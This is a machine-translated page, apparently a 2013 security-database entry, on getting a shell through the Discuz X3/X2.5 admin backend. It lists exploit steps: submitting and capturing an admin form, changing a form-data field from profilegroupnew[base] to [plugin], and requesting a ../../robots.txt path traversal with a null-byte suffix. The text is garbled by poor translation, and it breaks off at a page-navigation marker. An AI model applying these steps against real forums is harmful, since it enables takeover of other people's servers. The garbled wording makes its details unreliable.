dz3. 0/2. 5 Background to get shell-vulnerability warning-the black bar safety net

2013-05-25T00:00:00
ID MYHACK58:62201338938
Type myhack58
Reporter 佚名
Modified 2013-05-25T00:00:00

Description

To work seen after the tick community has released a discuz x3 the background to get the shell method, then t00ls members also tested discuz x2. 5 the background to get the shell method.

A good ass is I tested didn't, caught the packet and the given case is not the same now!

After the study found that step wrong.。。。。

Original post address content: http://zone.wooyun.org/content/3894

User – the user column – the column packet – submit – capture (I am in this error, be sure to submit, or catch the data packet is not the same)

| 1 | The Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]" ---|---

Instead

1 | Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]" ---|---

Access

1 | /home. php? mod=spacecp&id=../../robots. txt%0 0 5 7 ---|---

Use:

The original post test was dz x3, I test is dz x2. 5 ignoring the gpc

[1] [2] [3] next